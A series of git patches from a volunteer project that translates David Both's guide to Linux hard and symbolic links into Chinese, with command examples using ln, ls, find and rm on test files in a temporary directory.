Sun, 3 Dec 2017 13:08:26 +0800 Subject: [PATCH 0148/1627] =?UTF-8?q?=E5=AE=8C=E6=88=90=E7=BF=BB=E8=AF=91?= =?UTF-8?q?=EF=BC=8C=E6=96=87=E7=90=86=E4=B8=8D=E5=A4=AA=E9=80=9A=E9=A1=BA?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... guide to links in the Linux filesystem.md | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 5ee614a216..c270ded7df 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -6,7 +6,7 @@ linux 文件链接用户指南 ### 学习如何使用链接,通过提供对 linux 文件系统多个位置的文件访问,来让日常工作变得轻松 -![A user's guide to links in the Linux filesystem](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") +![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] 在我为 opensource.com 写过的关于linux文件系统方方面面的文章中,包括 [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13],我曾简要的提到过linux文件系统一个有趣的特性,它允许用户访问linux文件目录树中多个位置的文件来简化一些任务 @@ -186,9 +186,9 @@ ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': Invalid cross-device link ``` -为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。 Simply referring to a file by an inode number across the entire Linux directory structure can result in confusion because the same inode number can exist in each mounted filesystem. +为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。简单的通过文件节点号来跨越整个文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 -There may be a time when you will want to locate all the hard links that belong to a single inode. You can find the inode number using the **ls -li** command. Then you can use the **find** command to locate all links with that inode number. +有时你可能会想找到一个文件节点的所有硬链接。你可以使用 **ls -li** 命令。然后使用 **find** 命令找到所有硬链接的节点号。 ``` [dboth@david temp]$ find . -inum 657024 @@ -197,7 +197,7 @@ There may be a time when you will want to locate all the hard links that belong ./link2.file.txt ``` -Note that the **find** command did not find all four of the hard links to this inode because we started at the current directory of **~/temp**. The **find** command only finds files in the PWD and its subdirectories. To find all the links, we can use the following command, which specifies your home directory as the starting place for the search. +注意 **find** 命令不能找到所属该节点的四个硬链接,因为我们在 **~/temp** 目录中查找。 **find** 命令仅在当前工作目录及其子目录中中查找文件。要找到所有的硬链接,我们可以使用下列命令,注定你的主目录作为起始查找条件。 ``` [dboth@david temp]$ find ~ -samefile main.file.txt @@ -207,13 +207,13 @@ Note that the **find** command did not find all four of the hard links to this /home/dboth/main.file.txt ``` -You may see error messages if you do not have permissions as a non-root user. This command also uses the **-samefile** option instead of specifying the inode number. This works the same as using the inode number and can be easier if you know the name of one of the hard links. +如果你是非超级用户没有权限,可能会看到错误信息。这个命令也使用了 **-samefile** 选项而不是指定文件的节点号。这个效果和使用文件节点号一样且更容易,如果你知道其中一个硬链接名称的话。 -### **Experimenting with soft links** +### **对软链接进行实验** -As you have just seen, creating hard links is not possible across filesystem boundaries; that is, from a filesystem on one LV or partition to a filesystem on another. Soft links are a means to answer that problem with hard links. Although they can accomplish the same end, they are very different, and knowing these differences is important. +如你刚才看到的,不能越过文件系统交叉创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然他们可以达到相同的目的,但他们是非常不同的,知道这些差异是很重要的。 -Let's start by creating a symlink in our **~/temp** directory to start our exploration. +让我们在 **~/temp** 目录中创建一个符号链接来开始我们的探索。 ``` [dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li @@ -226,9 +226,9 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -The hard links, those that have the inode number **657024**, are unchanged, and the number of hard links shown for each has not changed. The newly created symlink has a different inode, number **658270**. The soft link named **link3.file.txt**points to **link2.file.txt**. Use the **cat** command to display the contents of **link3.file.txt**. The file mode information for the symlink starts with the letter "**l**" which indicates that this file is actually a symbolic link. +拥有节点号 **657024** 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的文件节点号 **658270**。 名为**link3.file.txt** 的软链接指向了 **link2.file.txt** 文件。使用 **cat** 命令查看 **link3.file.txt** 文件的内容。符号链接的文件节点信息以字母 "**l**" 开头,意味着这个文件实际是个符号链接。 -The size of the symlink **link3.file.txt** is only 14 bytes in the example above. That is the size of the text **link3.file.txt -> link2.file.txt**, which is the actual content of the directory entry. The directory entry **link3.file.txt** does not point to an inode; it points to another directory entry, which makes it useful for creating links that span file system boundaries. So, let's create that link we tried before from the **/tmp** directory. +上例中软链接文件 **link3.file.txt** 的大小只有 14 字节。这是文本内容 **link3.file.txt -> link2.file.txt** 的大小,实际上是目录项的内容。目录项 **link3.file.txt** 并不指向一个文件节点;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 **/tmp** 目录中尝试过的。 ``` [dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt @@ -237,11 +237,11 @@ lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> /home/dboth/temp/link2.file.txt ``` -### **Deleting links** +### **删除链接** -There are some other things that you should consider when you need to delete links or the files to which they point. +当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 -First, let's delete the link **main.file.txt**. Remember that every directory entry that points to an inode is simply a hard link. +首先,让我们删除硬链接文件 **main.file.txt**。注意每个硬链接都指向了一个文件节点。 ``` [dboth@david temp]$ rm main.file.txt ; ls -li @@ -253,9 +253,9 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -The link **main.file.txt** was the first link created when the file was created. Deleting it now still leaves the original file and its data on the hard drive along with all the remaining hard links. To delete the file and its data, you would have to delete all the remaining hard links. +**main.file.txt** 是第一个硬链接文件,当该文件被创建时。现在删除它仍然保留原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 -Now delete the **link2.file.txt** hard link. +现在山村 **link2.file.txt** 硬链接文件。 ``` [dboth@david temp]$ rm link2.file.txt ; ls -li @@ -267,26 +267,26 @@ link2.file.txt 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -Notice what happens to the soft link. Deleting the hard link to which the soft link points leaves a broken link. On my system, the broken link is highlighted in colors and the target hard link is flashing. If the broken link needs to be fixed, you can create another hard link in the same directory with the same name as the old one, so long as not all the hard links have been deleted. You could also recreate the link itself, with the link maintaining the same name but pointing to one of the remaining hard links. Of course, if the soft link is no longer needed, it can be deleted with the **rm** command. +注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标硬链接闪烁。如果需要修改软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除。 您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 **rm** 命令删除它们。 -The **unlink** command can also be used to delete files and links. It is very simple and has no options, as the **rm** command does. It does, however, more accurately reflect the underlying process of deletion, in that it removes the link—the directory entry—to the file being deleted. +**unlink** 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 **rm** 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 ### Final thoughts -I worked with both types of links for a long time before I began to understand their capabilities and idiosyncrasies. It took writing a lab project for a Linux class I taught to fully appreciate how links work. This article is a simplification of what I taught in that class, and I hope it speeds your learning curve. +我曾与这两种类型的链接很长一段时间后,我开始了解他们的能力和特质。为我所教的Linux课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 -------------------------------------------------------------------------------- 作者简介: -David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. +戴维.布斯 - 戴维.布斯是Linux和开源倡导者,居住在Raleigh的北卡罗莱纳。他在IT行业工作了四十年,为IBM工作了20年多的OS 2。在IBM时,他在1981编写了最初的IBM PC的第一个培训课程。他教了RHCE班红帽子和曾在MCI世通公司,思科,和北卡罗莱纳州。他已经用Linux和开源软件工作将近20年了。 --------------------------------- via: https://opensource.com/article/17/6/linking-linux-filesystem 作者:[David Both ][a] -译者:[runningwater](https://github.com/runningwater) +译者:[yongshouzhang](https://github.com/yongshouzhang) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 259baadd5f62c5a00c3247e01d59221e062861f6 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Sun, 3 Dec 2017 13:08:54 +0800 Subject: [PATCH 0149/1627] translating --- .../tech/20171201 How to Manage Users with Groups in Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md index 1ab98d864a..35350c819f 100644 --- a/sources/tech/20171201 How to Manage Users with Groups in Linux.md +++ b/sources/tech/20171201 How to Manage Users with Groups in Linux.md @@ -1,3 +1,5 @@ +translating---imquanquan + How to Manage Users with Groups in Linux ============================================================ From 0f130c8186d88e0fd09851e97cb9efbcbca62ea3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 3 Dec 2017 13:09:24 +0800 Subject: [PATCH 0150/1627] Update 20170622 A users guide to links in the Linux filesystem.md --- .../20170622 A users guide to links in the Linux filesystem.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index c270ded7df..dec2164d70 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -271,7 +271,7 @@ link2.file.txt **unlink** 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 **rm** 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 -### Final thoughts +### 写在最后 我曾与这两种类型的链接很长一段时间后,我开始了解他们的能力和特质。为我所教的Linux课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 From b345576b88aae0128c7effdeba11321e6f126b8f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 3 Dec 2017 13:12:01 +0800 Subject: [PATCH 0151/1627] =?UTF-8?q?=E7=AE=80=E5=8D=95=E6=A0=A1=E5=AF=B9?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170622 A users guide to links in the Linux filesystem.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index dec2164d70..673fc77104 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -287,7 +287,7 @@ via: https://opensource.com/article/17/6/linking-linux-filesystem 作者:[David Both ][a] 译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[校对者ID](https://github.com/校对者ID) +校对:[yongshouzhang](https://github.com/yongshouzhang) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 17094e32cd0b7ece3afb8ebe0902e83c59315164 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 3 Dec 2017 13:23:00 +0800 Subject: [PATCH 0152/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=20A=20user's=20gui?= =?UTF-8?q?de=20to=20links=20in=20the=20Linux=20filesystem?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- translated/tech/linux 文件链接用户指南.md | 311 ++++++++++++++++++++++ 1 file changed, 311 insertions(+) create mode 100644 translated/tech/linux 文件链接用户指南.md diff --git a/translated/tech/linux 文件链接用户指南.md b/translated/tech/linux 文件链接用户指南.md new file mode 100644 index 0000000000..84c5756c59 --- /dev/null +++ b/translated/tech/linux 文件链接用户指南.md @@ -0,0 +1,311 @@ + +linux 文件链接用户指南 +============================================================ + +### 学习如何使用链接,通过提供对 linux 文件系统多个位置的文件访问,来让日常工作变得轻松 + + +![linux 文件链接用户指南](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/links.png?itok=AumNmse7 "A user's guide to links in the Linux filesystem") +Image by : [Paul Lewin][8]. Modified by Opensource.com. [CC BY-SA 2.0][9] + +在我为 opensource.com 写过的关于linux文件系统方方面面的文章中,包括 [An introduction to Linux's EXT4 filesystem][10]; [Managing devices in Linux][11]; [An introduction to Linux filesystems][12]; and [A Linux user's guide to Logical Volume Management][13],我曾简要的提到过linux文件系统一个有趣的特性,它允许用户访问linux文件目录树中多个位置的文件来简化一些任务 + +linux 文件系统中有两种链接:硬链接和软链接。虽然二者差别显著,但都用来解决相似的问题。它们都提供了对单个文件进行多个目录项的访问(引用),但实现却大为不同。链接的强大功能赋予了 linux 文件系统灵活性,因为[一切即文件][14]。 + +更多 linux 资源 + +*   [什么是 linux ?][1] + +*   [什么是 linux 容器?][2] + +*   [现在下载: linux 命令速查表][3] + +*   [linux 高级命令速查表][4] + +*   [我们最新的 linux 文章][5] + +举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示就版本库缺失。 同城库中唯一变化是版本号。出于该直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。 程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 + +事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了住版本号,链接所指文件的文件名中同样包含了最小版本号。再比如,程序的一些必需文件为了迎合 linux 文件系统的规范从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 /lib64 目录做一个长清单列表,你会发现很多这样的例子。 + +``` +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwd -> ../../usr/share/cracklib/pw_dict.pwd +lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.pwi -> ../../usr/share/cracklib/pw_dict.pwi +lrwxrwxrwx. 1 root root 27 Jun 9 2016 libaccountsservice.so.0 -> libaccountsservice.so.0.0.0 +-rwxr-xr-x. 1 root root 288456 Jun 9 2016 libaccountsservice.so.0.0.0 +lrwxrwxrwx 1 root root 15 May 17 11:47 libacl.so.1 -> libacl.so.1.1.0 +-rwxr-xr-x 1 root root 36472 May 17 11:47 libacl.so.1.1.0 +lrwxrwxrwx. 1 root root 15 Feb 4 2016 libaio.so.1 -> libaio.so.1.0.1 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.0 +-rwxr-xr-x. 1 root root 6224 Feb 4 2016 libaio.so.1.0.1 +lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libakonadi-calendar.so.4.14.26 +-rwxr-xr-x. 1 root root 816160 Jan 16 16:39 libakonadi-calendar.so.4.14.26 +lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 +``` + +**/lib64** 目录下的一些链接 + +T在上面展示的 **/lib64** 目录清单列表中,文件模式第一个字母 I 表示这是一个符号链接或软链接。 + +### 硬链接 + +在 [An introduction to Linux's EXT4 filesystem][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的节点,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向文件节点的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的文件节点,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 + +如下图1所示,多个目录项指向了同一文件节点。这些目录项都是硬链接。我曾使用波浪线 (**~**) 表示三级目录项的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 **/home/user** 。值得注意的是,四级目录项是一个完全不同的目录,**/home/shared** 可能是该计算机上用户的共享文件目录。 + +![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) +Figure 1 + +单一文件系统中的文件硬链接数是有限制的。”文件系统“ 是就挂载在特定挂载点上的分区或逻辑卷而言的,此例中是 /home。这是因为文件系统中的节点号都是唯一的。在不同的文件系统中,如 **/var** 或 **/opt**,会有和 **/home** 中相同的节点号。 + +因为所有的硬链接都指向了包含文件元信息的节点,这些特性都是文件的一部分,像所属关系,权限,节点硬链接数目,这些特性不能区分不同的硬链接。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在节点信息中的文件名。对单靠 **file/inode** 来定位文件的同一目录中的硬链接必须拥有不同的文件名,基于上述事实,同一目录下不能存在重复的文件名。 + +文件的硬链接数目可通过 **ls -l** 来查看,如果你想查看实际节点号,可使用 **ls -li** 命令。 + +### 符号(软)链接 + +软链接(符号链接)和硬链接的区别在于,硬链接直接指向文件中的节点而软链接直接指向一个目录项,即一个硬链接。因为软链接指向一个文件的硬链接而非该文件的节点信息,所以它们并不依赖于文件节点,这使得它们能在不同的文件系统中起作用,跨越不同的分区和逻辑卷。 + +软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,**ls** 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 + +### 实验项目: 链接实验 + +我认为最容易理解链接用法及其差异的方法即使动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 **~/tmp** 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 + +### **初始工作** + +首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 + +``` +mkdir temp +``` + +使用这个命名将当前工作目录切换到 *~/temp**  + +``` +cd temp +``` + +实验开始,我们创建一个能够链接的文件,下列命令可完成该工作并向其填充内容。 + +``` +du -h > main.file.txt +``` + +使用 *ls -l** 长列表命名确认文件被正确地创建。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 + +``` +[dboth@david temp]$ ls -l +total 4 +-rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +在列表中,文件模式串后的数字 1 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 + +### **对硬链接进行实验** + +硬链接创建一个指向同一文件节点的目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 **~/temp**。创建一个指向 **main.file.txt** 的硬链接,然后查看该目录下文件列表。 + +``` +[dboth@david temp]$ ln main.file.txt link1.file.txt +[dboth@david temp]$ ls -l +total 8 +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +目录中两个文件都有两个链接且大小相同,时间戳也一样。这是同一文件节点的两个不同的硬链接,即该文件的目录项。再建立一个该文件的硬链接,并列出目录清单内容,你可以建立 **link1.file.txt** 或 **main.file.txt** 的硬链接。 + +``` +[dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l +total 16 +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + +注意,该目录下的每个硬链接必须使用不同的名称,因为同一目录下的两个文件不能拥有相同的文件名。试着创建一个和现存链接名称相同的硬链接。 + +``` +[dboth@david temp]$ ln main.file.txt link2.file.txt +ln: failed to create hard link 'link2.file.txt': File exists +``` + +显然不行,因为 **link2.file.txt** 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录,你的主目录中创建一个链接。 + +``` +[dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +``` + + 上面的 **ls** 命令显示 **main.file.txt** 文件确实存在于主目录中,且与该文件在 temp 目录中的名称一致。当然它们是没有区别的两个文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 temp 目录中添加一个非链接文件。 +``` +[dboth@david temp]$ touch unlinked.file ; ls -l +total 12 +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +-rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +-rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +使用 **ls** 命令的 **i** 选项查看文件节点的硬链接号和新创建文件的硬链接号。 + +``` +[dboth@david temp]$ ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +注意上面文件模式左边的数字 **657024** ,这是三个硬链接文件所指的同一文件的节点号,你也可以使用 **i** 选项查看主目录中所创建的链接节点号,和该值相同。只有一个链接的文件节点号和其他的不同,在你的系统上看到的不同于本文中的。 + +接着改变其中一个硬链接文件的大小。 + +``` +[dboth@david temp]$ df -h > link2.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +现在的硬链接文件大小比原来大,因为多个目录项链接着同一文件。 + +我知道下个实验在我的电脑上会成功,因为我的 **/tmp** 目录是一个独立的逻辑卷,如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U盘,如果上述选项适合你,你可以进行这个实验。 + +试着在 **/tmp** 目录中建立一个 **~/temp** 目录下文件的链接(或你的文件系统所在的位置) + +``` +[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt +ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': +Invalid cross-device link +``` + +为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。简单的通过文件节点号来跨越整个文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 + +有时你可能会想找到一个文件节点的所有硬链接。你可以使用 **ls -li** 命令。然后使用 **find** 命令找到所有硬链接的节点号。 + +``` +[dboth@david temp]$ find . -inum 657024 +./main.file.txt +./link1.file.txt +./link2.file.txt +``` + +注意 **find** 命令不能找到所属该节点的四个硬链接,因为我们在 **~/temp** 目录中查找。 **find** 命令仅在当前工作目录及其子目录中中查找文件。要找到所有的硬链接,我们可以使用下列命令,注定你的主目录作为起始查找条件。 + +``` +[dboth@david temp]$ find ~ -samefile main.file.txt +/home/dboth/temp/main.file.txt +/home/dboth/temp/link1.file.txt +/home/dboth/temp/link2.file.txt +/home/dboth/main.file.txt +``` + +如果你是非超级用户没有权限,可能会看到错误信息。这个命令也使用了 **-samefile** 选项而不是指定文件的节点号。这个效果和使用文件节点号一样且更容易,如果你知道其中一个硬链接名称的话。 + +### **对软链接进行实验** + +如你刚才看到的,不能越过文件系统交叉创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然他们可以达到相同的目的,但他们是非常不同的,知道这些差异是很重要的。 + +让我们在 **~/temp** 目录中创建一个符号链接来开始我们的探索。 + +``` +[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li +total 12 +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +拥有节点号 **657024** 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的文件节点号 **658270**。 名为**link3.file.txt** 的软链接指向了 **link2.file.txt** 文件。使用 **cat** 命令查看 **link3.file.txt** 文件的内容。符号链接的文件节点信息以字母 "**l**" 开头,意味着这个文件实际是个符号链接。 + +上例中软链接文件 **link3.file.txt** 的大小只有 14 字节。这是文本内容 **link3.file.txt -> link2.file.txt** 的大小,实际上是目录项的内容。目录项 **link3.file.txt** 并不指向一个文件节点;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 **/tmp** 目录中尝试过的。 + +``` +[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt +/tmp/link3.file.txt ; ls -l /tmp/link* +lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> +/home/dboth/temp/link2.file.txt +``` + +### **删除链接** + +当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 + +首先,让我们删除硬链接文件 **main.file.txt**。注意每个硬链接都指向了一个文件节点。 + +``` +[dboth@david temp]$ rm main.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +**main.file.txt** 是第一个硬链接文件,当该文件被创建时。现在删除它仍然保留原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 + +现在山村 **link2.file.txt** 硬链接文件。 + +``` +[dboth@david temp]$ rm link2.file.txt ; ls -li +total 8 +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt +658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> +link2.file.txt +657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt +657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file +``` + +注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标硬链接闪烁。如果需要修改软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除。 您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 **rm** 命令删除它们。 + +**unlink** 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 **rm** 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 + +### 写在最后 + +我曾与这两种类型的链接很长一段时间后,我开始了解他们的能力和特质。为我所教的Linux课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 + +-------------------------------------------------------------------------------- + +作者简介: + +戴维.布斯 - 戴维.布斯是Linux和开源倡导者,居住在Raleigh的北卡罗莱纳。他在IT行业工作了四十年,为IBM工作了20年多的OS 2。在IBM时,他在1981编写了最初的IBM PC的第一个培训课程。他教了RHCE班红帽子和曾在MCI世通公司,思科,和北卡罗莱纳州。他已经用Linux和开源软件工作将近20年了。 + +--------------------------------- + +via: https://opensource.com/article/17/6/linking-linux-filesystem + +作者:[David Both ][a] +译者:[yongshouzhang](https://github.com/yongshouzhang) +校对:[yongshouzhang](https://github.com/yongshouzhang) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/dboth +[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu +[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu +[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ +[5]:https://opensource.com/tags/linux?src=linux_resource_menu 